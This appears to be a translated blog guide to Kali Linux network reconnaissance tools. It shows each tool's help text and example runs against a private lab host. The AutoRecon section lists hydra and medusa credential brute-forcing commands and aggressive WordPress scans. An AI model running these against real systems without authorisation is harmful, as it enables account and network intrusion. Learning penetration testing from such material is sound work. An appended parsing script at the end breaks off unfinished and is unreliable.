A brief introduction to the tools listed on Kali Tools that I have actually verified to work.
※ This covers roughly 50% of all the tools. The main reasons a tool is not covered are that I could not set up a test environment for it, could not verify it because of errors, or could not work out how to use it; I also omitted some simply because the sheer number of tools made the browser freeze. Please bear with me.
※ The tool categories are just rough labels I assigned, so they may not be a good fit (the tools are simply listed in the order I tried them, A to Z; the order has no particular meaning).
Network Tools
Network Scanning
Amap
Guesses which application is running on the specified port(s).
■ Usage
root@kali:~# amap --help
Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
Modes:
-A Map applications: send triggers and analyse responses (default)
-B Just grab banners, do not send triggers
-P No banner or application stuff - be a (full connect) port scanner
Options:
-1 Only send triggers to a port until 1st identification. Speeeeed!
-6 Use IPv6 instead of IPv4
-b Print ascii banner of responses
-i FILE Nmap machine readable outputfile to read ports from
-u Ports specified on commandline are UDP (default is TCP)
-R Do NOT identify RPC service
-H Do NOT send application triggers marked as potentially harmful
-U Do NOT dump unrecognised responses (better for scripting)
-d Dump all responses
-v Verbose mode, use twice (or more!) for debug (not recommended :-)
-q Do not report closed ports, and do not print them as unidentified
-o FILE [-m] Write output to file FILE, -m creates machine readable output
-c CONS Amount of parallel connections to make (default 32, max 256)
-C RETRIES Number of reconnects on connect timeouts (see -T) (default 3)
-T SEC Connect timeout on connection attempts in seconds (default 5)
-t SEC Response wait timeout in seconds (default 5)
-p PROTO Only send triggers for this protocol (e.g. ftp)
TARGET PORT The target address and port(s) to scan (additional to -i)
■ Example
root@kali:~# nmap 192.168.11.4 -oM scan.out
root@kali:~# amap -i scan.out
Protocol on 192.168.11.4:21/tcp matches ftp
Protocol on 192.168.11.4:3306/tcp matches mysql
Protocol on 192.168.11.4:6667/tcp matches ircd
Protocol on 192.168.11.4:5900/tcp matches vnc
Protocol on 192.168.11.4:23/tcp matches telnet
Protocol on 192.168.11.4:8180/tcp matches http
Protocol on 192.168.11.4:8180/tcp matches http-apache-2
Protocol on 192.168.11.4:22/tcp matches ssh
Protocol on 192.168.11.4:22/tcp matches ssh-openssh
Protocol on 192.168.11.4:80/tcp matches http
Protocol on 192.168.11.4:80/tcp matches http-apache-2
Protocol on 192.168.11.4:2121/tcp matches ftp
Protocol on 192.168.11.4:25/tcp matches smtp
Protocol on 192.168.11.4:445/tcp matches mysql
Protocol on 192.168.11.4:445/tcp matches netbios-session
Protocol on 192.168.11.4:139/tcp matches ms-ds
Protocol on 192.168.11.4:445/tcp matches ms-ds
Protocol on 192.168.11.4:513/tcp matches (response_of_many_applications)
Protocol on 192.168.11.4:139/tcp matches mysql
Protocol on 192.168.11.4:139/tcp matches netbios-session
Protocol on 192.168.11.4:5432/tcp matches mysql
Protocol on 192.168.11.4:513/tcp matches rlogin
Protocol on 192.168.11.4:6000/tcp matches x-windows
arp-scan
Discovers IPv4 hosts on the local network using the ARP protocol.
■ Usage
root@kali:~# arp-scan --help
Usage: arp-scan [options] [hosts...]
[...]
Options:
The data type for option arguments is shown by a letter in angle brackets:
<s> Character string.
<i> Decimal integer, or hex if preceeded by 0x e.g. 2048 or 0x800.
<f> Floating point decimal number.
<m> MAC address, e.g. 01:23:45:67:89:ab or 01-23-45-67-89-ab (case insensitive)
<a> IPv4 address e.g. 10.0.0.1
<h> Hex encoded binary data. No leading 0x. (case insensitive).
<x> Something else - see option description.
General Options:
--help or -h Display this usage message and exit.
--verbose or -v Display verbose progress messages.
Can be used than once to increase verbosity. Max=3.
--version or -V Display program version details and exit.
Shows the version, license details, libpcap version,
and whether POSIX.1e capability support is included.
--interface=<s> or -I <s> Use network interface <s>.
If this option is not specified, arp-scan will search
the system interface list for the lowest numbered,
configured up interface (excluding loopback).
Host Selection:
--file=<s> or -f <s> Read hostnames or addresses from the specified file
One name or address pattern per line. Use "-" for stdin.
--localnet or -l Generate addresses from interface configuration.
Generates list from interface address and netmask
(network and broadcast included). You cannot use the
--file option or give targets on the command line.
Use --interface to specify the interface.
MAC/Vendor Mapping Files:
--ouifile=<s> or -O <s> Use IEEE registry vendor mapping file <s>.
Default is ieee-oui.txt in the current directory. If
that is not found /usr/share/arp-scan/ieee-oui.txt
is used.
--macfile=<s> or -m <s> Use custom vendor mapping file <s>.
Default is mac-vendor.txt in the current directory.
If that is not found
/etc/arp-scan/mac-vendor.txt is used.
Output Format Control:
--quiet or -q Display minimal output for each responding host.
Only the IP address and MAC address are displayed.
Reduces memory usage by about 5MB because the
vendor mapping files are not used. Only the ${ip}
and ${mac} fields are available for the --format
option if --quiet is specified.
--plain or -x Supress header and footer text.
Only display the responding host details. Useful if
the output will be parsed by a script.
--ignoredups or -g Don't display duplicate packets.
By default duplicate packets are flagged with
"(DUP: n)" where n is the number of times this
host has responded.
--rtt or -D Calculate and display the packet round-trip time.
The time is displayed in milliseconds and fractional
microseconds. Makes the ${rtt} field available for
--format.
--format=<s> or -F <s> Specify the output format string.
The format is a string that will be output for each
responding host. Host details can be included by
inserting references to fields using the syntax
"${field[;width]}". Fields are displayed right-
aligned unless the width is negative in which case
left alignment will be used. The following case-
insensitive field names are recognised:
IP Host IPv4 address in dotted quad format
Name Host name if --resolve option given
MAC Host MAC address xx:xx:xx:xx:xx:xx
HdrMAC Ethernet source addr if different
Vendor Vendor details string
Padding Padding after ARP packet in hex if nonzero
Framing Framing type if not Ethernet_II
VLAN 802.1Q VLAD ID if present
Proto ARP protocol if not 0x0800
DUP Packet number for duplicate packets (>1)
RTT Round trip time if --rtt option given
Only the "ip" and "mac" fields are available if the
--quiet option is specified.
Any characters that are not fields are output
verbatim. "\" introduces escapes:
\n newline
\r carriage return
\t tab
\ suppress special meaning for following character
You should enclose the --format argument in 'single
quotes' to protect special characters from the shell.
Example: --format='${ip}\t${mac}\t${vendor}'
Host List Randomisation:
--random or -R Randomise the target host list.
--randomseed=<i> Seed the pseudo random number generator.
Useful if you want a reproducible --random order.
Output Timing and Retry:
--retry=<i> or -r <i> Set total number of attempts per host to <i>,
default=2.
--backoff=<f> or -b <f> Set backoff factor to <f>, default=1.50.
Multiplies timeout by <f> for each pass.
--timeout=<i> or -t <i> Set initial per host timeout to <i> ms, default=500.
This timeout is for the first packet sent to each host.
subsequent timeouts are multiplied by the backoff
factor which is set with --backoff.
--interval=<x> or -i <x> Set minimum packet interval to <x>.
This controls the outgoing bandwidth usage by limiting
the packet rate. If you want to use up to a given
bandwidth it is easier to use the --bandwidth option
instead. The interval is in milliseconds, or
microseconds if "u" is appended.
--bandwidth=<x> or -B <x> Set outbound bandwidth to <x>, default=256000.
The value is in bits per second. Append K for
kilobits or M for megabits (decimal multiples). You
cannot specify both --interval and --bandwidth.
DNS Resolution:
--numeric or -N Targets must be IP addresses, not hostnames.
Can reduce startup time for large target lists.
--resolve or -d Resolve responding addresses to hostnames.
The default output format will display the hostname
instead of the IPv4 address. This option makes the
${name} field available for the --format option.
Output ARP Packet:
--arpsha=<m> or -u <m> Set the ARP source Ethernet address.
Sets the 48-bit ar$sha field but does not change the
hardware address in the frame header, see --srcaddr
for how to change that address. Default is the
Ethernet address of the outgoing interface.
--arptha=<m> or -w <m> Set the ARP target Ethernet address.
Sets the 48-bit ar$tha field. The default is zero
because this field is not used for ARP request packets.
--arphrd=<i> or -H <i> Set the ARP hardware type, default=1.
Sets the 16-bit ar$hrd field. The default is 1
(ARPHRD_ETHER). Many operating systems also respond to
6 (ARPHRD_IEEE802)
--arppro=<i> or -p <i> Set the ARP protocol type, default=0x0800.
Sets the 16-bit ar$pro field. Most operating systems
only respond to 0x0800 (IPv4).
--arphln=<i> or -a <i> Set the hardware address length, default=6.
Sets the 8-bit ar$hln field. The lengths of the
ar$sha and ar$tha fields are not changed by this
option; it only changes the ar$hln field.
--arppln=<i> or -P <i> Set the protocol address length, default=4.
Sets the 8-bit ar$pln field. The lengths of the ar$spa
and ar$tpa fields are not changed by this option;
it only changes the ar$pln field.
--arpop=<i> or -o <i> Specify the ARP operation, default=1.
Sets the 16-bit ar$op field. Most operating systems
only respond to the value 1 (ARPOP_REQUEST).
--arpspa=<a> or -s <a> Set the source IPv4 address.
The address should be in dotted quad format, or the
string "dest", which sets the source address to
the target host address. The default is the outgoing
interface address. Sets the 32-bit ar$spa field. Some
operating systems only respond if the source address
is within the network of the receiving interface.
Setting ar$spa to the destination IP address can cause
some operating systems to report an address clash.
Output Ethernet Header:
--srcaddr=<m> or -S <m> Set the source Ethernet MAC address.
Default is the interface MAC address. This sets the
address in the Ethernet header. It does not change the
address in the ARP packet: use --arpsha to change
that address.
--destaddr=<m> or -T <m> Set the destination MAC address.
Sets the destination address in the Ethernet
header. Default is ff:ff:ff:ff:ff:ff (broadcast)
Hosts also respond if the request is sent to their
unicast address, or to a multicast address they
are listening on.
--prototype=<i> or -y <i> Sets the Ethernet protocol type, default=0x0806.
This sets the protocol type field in the Ethernet
header.
--llc or -L Use RFC 1042 LLC/SNAP encapsulation for 802.2 networks.
arp-scan will decode and display ARP responses in both
Ethernet-II and IEEE 802.2 formats irrespective of
this option.
--vlan=<i> or -Q <i> Use 802.1Q tagging with VLAN id <i>.
The id should be in the range 0 to 4095. arp-scan will
decode and display ARP responses in 802.1Q format
irrespective of this option.
Misc Options:
--limit=<i> or -M <i> Exit after the specified number of hosts have responded.
arp-scan will exit with status 1 if the number of
responding hosts is less than the limit. Can be used
in scripts to check if fewer hosts respond without
having to parse the output.
--pcapsavefile=<s> or -W <s> Write received packets to pcap savefile <s>.
ARP responses will be written to the specified file
as well as being decoded and displayed.
--snap=<i> or -n <i> Set the pcap snap length to <i>. Default=64.
Specifies the frame capture length, including the
Ethernet header. The default is normally sufficient.
--retry-send=<i> or -Y <i> Set number of send attempts, default=20.
--retry-send-interval=<i> or -E <i> Set interval between send attempts.
Interval is in milliseconds or microseconds if "u"
is appended. default=5.
--padding=<h> or -A <h> Specify padding after packet data.
Set padding after the ARP request to hex value <h>.
■ Example
root@kali:~# arp-scan --localnet
Interface: eth0, type: EN10MB, MAC: 00:15:5d:ec:c6:aa, IPv4: 192.168.11.2
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 d4:2c:46:be:0f:60 BUFFALO.INC
192.168.11.3 dc:fb:48:75:75:0b Intel Corporate
192.168.11.4 dc:a2:66:20:35:65 Hon Hai Precision Ind. Co.,Ltd.
ARPing
Broadcasts ARP packets for the specified IP address on the local network and displays the responses.
■ Usage
root@kali:~# arping --help
usage: arping [ -0aAbdDeFpPqrRuUvzZ ] [ -w <sec> ] [ -W <sec> ] [ -S <host/ip> ]
[ -T <host/ip ] [ -s <MAC> ] [ -t <MAC> ] [ -c <count> ]
[ -C <count> ] [ -i <interface> ] [ -m <type> ] [ -g <group> ]
[ -V <vlan> ] [ -Q <priority> ] <host/ip/MAC | -B>
Options:
-0 Use this option to ping with source IP address 0.0.0.0. Use this
when you haven't configured your interface yet. Note that this
may get the MAC-ping unanswered. This is an alias for -S
0.0.0.0.
-a Audiable ping.
-A Only count addresses matching requested address (This *WILL*
break most things you do. Only useful if you are arpinging many
hosts at once. See arping-scan-net.sh for an example).
-b Like -0 but source broadcast source address (255.255.255.255).
Note that this may get the arping unanswered since it's not nor-
mal behavior for a host.
-B Use instead of host if you want to address 255.255.255.255.
-c count
Only send count requests.
-C count
Only wait for this many replies, regardless of -c and -w.
-d Find duplicate replies. Exit with 1 if there are answers from
two different MAC addresses.
-D Display answers as exclamation points and missing packets as dots.
-e Like -a but beep when there is no reply.
-F Don't try to be smart about the interface name. (even if this
switch is not given, -i overrides smartness)
-g group
setgid() to this group instead of the nobody group.
-h Displays a help message and exits.
-i interface
Use the specified interface.
-m type
Type of timestamp to use for incoming packets. Use -vv when
pinging to list available ones.
-q Does not display messages, except error messages.
-Q pri 802.1p priority to set. Should be used with 802.1Q (-V).
Defaults to 0.
-r Raw output: only the MAC/IP address is displayed for each reply.
-R Raw output: Like -r but shows "the other one", can be combined
with -r.
-s MAC Set source MAC address. You may need to use -p with this.
-S IP Like -b and -0 but with set source address. Note that this may
get the arping unanswered if the target does not have routing to
the IP. If you don't own the IP you are using, you may need to
turn on promiscious mode on the interface (with -p). With this
switch you can find out what IP-address a host has without tak-
ing an IP-address yourself.
-t MAC Set target MAC address to use when pinging IP address.
-T IP Use -T as target address when pinging MACs that won't respond to
a broadcast ping but perhaps to a directed broadcast.
Example:
To check the address of MAC-A, use knowledge of MAC-B and IP-B.
$ arping -S <IP-B> -s <MAC-B> -p <MAC-A>
-p Turn on promiscious mode on interface, use this if you don't
"own" the MAC address you are using.
-P Send ARP replies instead of requests. Useful with -U.
-u Show index=received/sent instead of just index=received when
pinging MACs.
-U Send unsolicited ARP.
-v Verbose output. Use twice for more messages.
-V num 802.1Q tag to add. Defaults to no VLAN tag.
-w sec Specify a timeout before ping exits regardless of how many
packets have been sent or received.
-W sec Time to wait between pings.
-z Enable seccomp
-Z Disable seccomp (default)
■ Example
root@kali:~# arping -c 3 -i eth0 192.169.11.4
ARPING 192.169.11.3
42 bytes from 02:42:ac:12:00:03 (192.169.11.4): index=0 time=9.301 usec
42 bytes from 02:42:ac:12:00:03 (192.169.11.4): index=1 time=4.900 usec
42 bytes from 02:42:ac:12:00:03 (192.169.11.4): index=2 time=13.101 usec
--- 192.169.11.3 statistics ---
3 packets transmitted, 3 packets received, 0% unanswered (0 extra)
rtt min/avg/max/std-dev = 0.005/0.009/0.013/0.003 ms
# Capture packets while arping is running
root@kali:~# tcpdump -n -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
11:59:12.063192 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:12.063247 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:12.063255 ARP, Reply 192.168.11.4 is-at 02:42:ac:12:00:03, length 28
11:59:13.064481 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:13.064511 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:13.064514 ARP, Reply 192.168.11.4 is-at 02:42:ac:12:00:03, length 28
11:59:14.065806 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:14.065878 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:14.065888 ARP, Reply 192.168.11.4 is-at 02:42:ac:12:00:03, length 28
AutoRecon
Runs port scans and service-detection scans, performs additional scans with the appropriate tools based on what was detected, and outputs the results as a report.
■ Usage
root@kali:~# autorecon --help
usage: autorecon [-t TARGET_FILE] [-p PORTS] [-m MAX_SCANS] [-mp MAX_PORT_SCANS] [-c CONFIG_FILE] [-g GLOBAL_FILE] [--tags TAGS]
[--exclude-tags TAGS] [--port-scans PLUGINS] [--service-scans PLUGINS] [--reports PLUGINS]
[--plugins-dir PLUGINS_DIR] [--add-plugins-dir PLUGINS_DIR] [-l [TYPE]] [-o OUTPUT] [--single-target]
[--only-scans-dir] [--no-port-dirs] [--heartbeat HEARTBEAT] [--timeout TIMEOUT]
[--target-timeout TARGET_TIMEOUT] [--nmap NMAP | --nmap-append NMAP_APPEND] [--proxychains]
[--disable-sanity-checks] [--disable-keyboard-control] [--force-services SERVICE [SERVICE ...]]
[-mpti PLUGIN:NUMBER [PLUGIN:NUMBER ...]] [-mpgi PLUGIN:NUMBER [PLUGIN:NUMBER ...]] [--accessible] [-v]
[--version] [--curl.path VALUE] [--dirbuster.tool {feroxbuster,gobuster,dirsearch,ffuf,dirb}]
[--dirbuster.wordlist VALUE [VALUE ...]] [--dirbuster.threads VALUE] [--dirbuster.ext VALUE]
[--dirbuster.recursive] [--dirbuster.extras VALUE] [--enum4linux.tool {enum4linux-ng,enum4linux}]
[--onesixtyone.community-strings VALUE] [--subdomain-enum.domain VALUE]
[--subdomain-enum.wordlist VALUE [VALUE ...]] [--subdomain-enum.threads VALUE] [--vhost-enum.hostname VALUE]
[--vhost-enum.wordlist VALUE [VALUE ...]] [--vhost-enum.threads VALUE] [--wpscan.api-token VALUE]
[--global.username-wordlist VALUE] [--global.password-wordlist VALUE] [--global.domain VALUE] [-h]
[targets ...]
Network reconnaissance tool to port scan and automatically enumerate services found on multiple targets.
positional arguments:
targets IP addresses (e.g. 10.0.0.1), CIDR notation (e.g. 10.0.0.1/24), or resolvable hostnames (e.g. foo.bar)
to scan.
options:
-t TARGET_FILE, --target-file TARGET_FILE
Read targets from file.
-p PORTS, --ports PORTS
Comma separated list of ports / port ranges to scan. Specify TCP/UDP ports by prepending list with T:/U:
To scan both TCP/UDP, put port(s) at start or specify B: e.g. 53,T:21-25,80,U:123,B:123. Default: None
-m MAX_SCANS, --max-scans MAX_SCANS
The maximum number of concurrent scans to run. Default: 50
-mp MAX_PORT_SCANS, --max-port-scans MAX_PORT_SCANS
The maximum number of concurrent port scans to run. Default: 10 (approx 20% of max-scans unless
specified)
-c CONFIG_FILE, --config CONFIG_FILE
Location of AutoRecon's config file. Default: /root/.config/AutoRecon/config.toml
-g GLOBAL_FILE, --global-file GLOBAL_FILE
Location of AutoRecon's global file. Default: /root/.config/AutoRecon/global.toml
--tags TAGS Tags to determine which plugins should be included. Separate tags by a plus symbol (+) to group tags
together. Separate groups with a comma (,) to create multiple groups. For a plugin to be included, it
must have all the tags specified in at least one group. Default: default
--exclude-tags TAGS Tags to determine which plugins should be excluded. Separate tags by a plus symbol (+) to group tags
together. Separate groups with a comma (,) to create multiple groups. For a plugin to be excluded, it
must have all the tags specified in at least one group. Default: None
--port-scans PLUGINS Override --tags / --exclude-tags for the listed PortScan plugins (comma separated). Default: None
--service-scans PLUGINS
Override --tags / --exclude-tags for the listed ServiceScan plugins (comma separated). Default: None
--reports PLUGINS Override --tags / --exclude-tags for the listed Report plugins (comma separated). Default: None
--plugins-dir PLUGINS_DIR
The location of the plugins directory. Default: /root/.local/share/AutoRecon/plugins
--add-plugins-dir PLUGINS_DIR
The location of an additional plugins directory to add to the main one. Default: None
-l [TYPE], --list [TYPE]
List all plugins or plugins of a specific type. e.g. --list, --list port, --list service
-o OUTPUT, --output OUTPUT
The output directory for results. Default: results
--single-target Only scan a single target. A directory named after the target will not be created. Instead, the
directory structure will be created within the output directory. Default: False
--only-scans-dir Only create the "scans" directory for results. Other directories (e.g. exploit, loot, report) will not
be created. Default: False
--no-port-dirs Don't create directories for ports (e.g. scans/tcp80, scans/udp53). Instead store all results in the
"scans" directory itself. Default: False
--heartbeat HEARTBEAT
Specifies the heartbeat interval (in seconds) for scan status messages. Default: 60
--timeout TIMEOUT Specifies the maximum amount of time in minutes that AutoRecon should run for. Default: None
--target-timeout TARGET_TIMEOUT
Specifies the maximum amount of time in minutes that a target should be scanned for before abandoning it
and moving on. Default: None
--nmap NMAP Override the {nmap_extra} variable in scans. Default: -vv --reason -Pn -T4
--nmap-append NMAP_APPEND
Append to the default {nmap_extra} variable in scans. Default:
--proxychains Use if you are running AutoRecon via proxychains. Default: False
--disable-sanity-checks
Disable sanity checks that would otherwise prevent the scans from running. Default: False
--disable-keyboard-control
Disables keyboard control ([s]tatus, Up, Down) if you are in SSH or Docker.
--force-services SERVICE [SERVICE ...]
A space separated list of services in the following style: tcp/80/http tcp/443/https/secure
-mpti PLUGIN:NUMBER [PLUGIN:NUMBER ...], --max-plugin-target-instances PLUGIN:NUMBER [PLUGIN:NUMBER ...]
A space separated list of plugin slugs with the max number of instances (per target) in the following
style: nmap-http:2 dirbuster:1. Default: None
-mpgi PLUGIN:NUMBER [PLUGIN:NUMBER ...], --max-plugin-global-instances PLUGIN:NUMBER [PLUGIN:NUMBER ...]
A space separated list of plugin slugs with the max number of global instances in the following style:
nmap-http:2 dirbuster:1. Default: None
--accessible Attempts to make AutoRecon output more accessible to screenreaders. Default: False
-v, --verbose Enable verbose output. Repeat for more verbosity.
--version Prints the AutoRecon version and exits.
-h, --help Show this help message and exit.
plugin arguments:
These are optional arguments for certain plugins.
--curl.path VALUE The path on the web server to curl. Default: /
--dirbuster.tool {feroxbuster,gobuster,dirsearch,ffuf,dirb}
The tool to use for directory busting. Default: feroxbuster
--dirbuster.wordlist VALUE [VALUE ...]
The wordlist(s) to use when directory busting. Separate multiple wordlists with spaces. Default:
['/root/.local/share/AutoRecon/wordlists/dirbuster.txt']
--dirbuster.threads VALUE
The number of threads to use when directory busting. Default: 10
--dirbuster.ext VALUE
The extensions you wish to fuzz (no dot, comma separated). Default: txt,html,php,asp,aspx,jsp
--dirbuster.recursive
Enables recursive searching (where available). Warning: This may cause significant increases to scan
times. Default: False
--dirbuster.extras VALUE
Any extra options you wish to pass to the tool when it runs. e.g. --dirbuster.extras='-s 200,301
--discover-backup'
--enum4linux.tool {enum4linux-ng,enum4linux}
The tool to use for doing Windows and Samba enumeration. Default: enum4linux-ng
--onesixtyone.community-strings VALUE
The file containing a list of community strings to try. Default:
/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt
--subdomain-enum.domain VALUE
The domain to use as the base domain (e.g. example.com) for subdomain enumeration. Default: None
--subdomain-enum.wordlist VALUE [VALUE ...]
The wordlist(s) to use when enumerating subdomains. Separate multiple wordlists with spaces. Default:
['/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt']
--subdomain-enum.threads VALUE
The number of threads to use when enumerating subdomains. Default: 10
--vhost-enum.hostname VALUE
The hostname to use as the base host (e.g. example.com) for virtual host enumeration. Default: None
--vhost-enum.wordlist VALUE [VALUE ...]
The wordlist(s) to use when enumerating virtual hosts. Separate multiple wordlists with spaces. Default:
['/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt']
--vhost-enum.threads VALUE
The number of threads to use when enumerating virtual hosts. Default: 10
--wpscan.api-token VALUE
An API Token from wpvulndb.com to help search for more vulnerabilities.
global plugin arguments:
These are optional arguments that can be used by all plugins.
--global.username-wordlist VALUE
A wordlist of usernames, useful for bruteforcing. Default: /usr/share/seclists/Usernames/top-usernames-
shortlist.txt
--global.password-wordlist VALUE
A wordlist of passwords, useful for bruteforcing. Default:
/usr/share/seclists/Passwords/darkweb2017-top100.txt
--global.domain VALUE
The domain to use (if known). Used for DNS and/or Active Directory. Default: None
■ Example
root@kali:~# autorecon 192.168.11.4 \
--dirbuster.threads 40 \
--dirbuster.wordlist raft-large-directories.txt raft-large-files.txt \
--nmap-append="--script-timeout=30s" --no-port-dirs \
--reports markdown -o /root -v
[*] Scanning target 192.168.11.4
[*] Port scan Top TCP Ports (top-tcp-ports) running against 192.168.11.4
[*] Port scan Top TCP Ports (top-tcp-ports) is running the following command against 192.168.11.4: nmap -vv --reason -Pn -T4 --script-timeout=30s -sV -sC --version-all -A --osscan-guess -oN "/root/192.168.11.4/scans/_quick_tcp_nmap.txt" -oX "/root/192.168.11.4/scans/xml/_quick_tcp_nmap.xml" 192.168.11.4
[*] Port scan All TCP Ports (all-tcp-ports) running against 192.168.11.4
[...]
[*] Port scan Top 100 UDP Ports (top-100-udp-ports) against 192.168.11.4 finished in 3 minutes, 50 seconds
[*] Finished scanning target 192.168.11.4 in 3 minutes, 51 seconds
[*] Finished scanning all targets in 3 minutes, 52 seconds!
[*] Don't forget to check out more commands to run manually in the _manual_commands.txt file in each target's scans directory!
An example of the generated report:
Because a web service was detected, Nikto is run automatically.
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.11.4
+ Target Hostname: 192.168.11.4
+ Target Port: 80
+ Start Time: 2024-09-16 04:06:27 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.53 (Debian)
+ /: Retrieved x-powered-by header: PHP/7.4.28.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://192.168.11.4/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index.php?: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.53 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 7729 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2024-09-16 04:06:50 (GMT0) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Recommended scans are suggested according to the detected services (to be run manually by the user).
[*] http on tcp/80
[-] (ffuf) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
ffuf -u http://192.168.11.4:80/FUZZ -t 40 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v -r -noninteractive | tee /root/192.168.11.4/scans/tcp_80_http_ffuf_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/root/192.168.11.4/scans/tcp_80_http_auth_hydra.txt" http-get://192.168.11.4/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/root/192.168.11.4/scans/tcp_80_http_auth_medusa.txt" -M http -h 192.168.11.4 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/root/192.168.11.4/scans/tcp_80_http_form_hydra.txt" http-post-form://192.168.11.4/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/root/192.168.11.4/scans/tcp_80_http_form_medusa.txt" -M web-form -h 192.168.11.4 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://192.168.11.4:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/root/192.168.11.4/scans/tcp_80_http_wpscan.txt"
Braa
An SNMP scanner. It can scan a large number of hosts at high speed.
■ Usage
root@kali:~# braa --help
usage: braa [options] [query1] [query2] ...
-h Show this help.
-2 Claim to be a SNMP2C agent.
-v Show short summary after doing all queries.
-x Hexdump octet-strings
-t <s> Wait <s> seconds for responses.
-d <s> Wait <s> microseconds after sending each packet.
-p <s> Wait <s> milliseconds between subsequent passes.
-f <file> Load queries from file <file> (one by line).
-a <time> Quit after <time> seconds, independent on what happens.
-r <rc> Retry count (default: 3).
Query format:
GET: [community@]iprange[:port]:oid[/id]
WALK: [community@]iprange[:port]:oid.*[/id]
SET: [community@]iprange[:port]:oid=value[/id]
Examples:
public@10.253.101.1:161:.1.3.6.*
10.253.101.1-10.253.101.255:.1.3.6.1.2.1.1.4.0=sme
10.253.101.1:.1.3.6.1.2.1.1.1.0/description
It is also possible to specify multiple queries at once:
10.253.101.1-10.253.101.255:.1.3.6.1.2.1.1.4.0=sme,.1.3.6.*
(Will set .1.3.6.1.2.1.1.4.0 to 'me' and do a walk starting from .1.3.6)
Values for SET queries have to be prepended with a character specifying the value type:
i is INTEGER
a is IPADDRESS
s is OCTET STRING
o is OBJECT IDENTIFIER
If the type specifier is missing, the value type is auto-detected
■ Example
# Retrieve sysDescr, hrStorageAllocationUnits and hrStorageSize from two hosts
root@kali:~# braa \
public@192.168.11.3-192.168.11.4:.1.3.6.1.2.1.1.1.0/sysDescr \
public@192.168.11.3-192.168.11.4:.1.3.6.1.2.1.25.2.3.1.4.1/hrStorageAllocationUnits \
public@192.168.11.3-192.168.11.4:.1.3.6.1.2.1.25.2.3.1.5.1/hrStorageSize
sysDescr:192.168.11.3:21ms:.0:Hardware: Intel64 Family 6 Model 142 Stepping 11 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 22635 Multiprocessor Free)
hrStorageAllocationUnits:192.168.11.3:21ms:.1:4096
hrStorageSize:192.168.11.3:21ms:.1:62190335
sysDescr:192.168.11.4:21ms:.0:Hardware: AMD64 Family 23 Model 17 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 19045 Multiprocessor Free)
hrStorageAllocationUnits:192.168.11.4:21ms:.1:4096
hrStorageSize:192.168.11.4:21ms:.1:121528319
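The two storage OIDs above are only useful together: HOST-RESOURCES-MIB expresses a volume's size as hrStorageSize blocks of hrStorageAllocationUnits bytes each. The following is an added example (not code from the original page or the braa project) that parses braa's `label:ip:rtt:index:value` lines, joins the two answers per host and prints the size in bytes and GiB. The sample input is constructed to match the output shown above, not captured from a live host; the index `.1` is simply whichever storage entry the agent lists first, so a real inventory would walk the whole hrStorageTable instead.

```shell
#!/bin/sh
# Added example (not from the original page or braa): compute storage size from braa output.
# Assumed producer (run separately, needs network access):
#   braa public@192.168.11.3-192.168.11.4:.1.3.6.1.2.1.25.2.3.1.4.1/hrStorageAllocationUnits \
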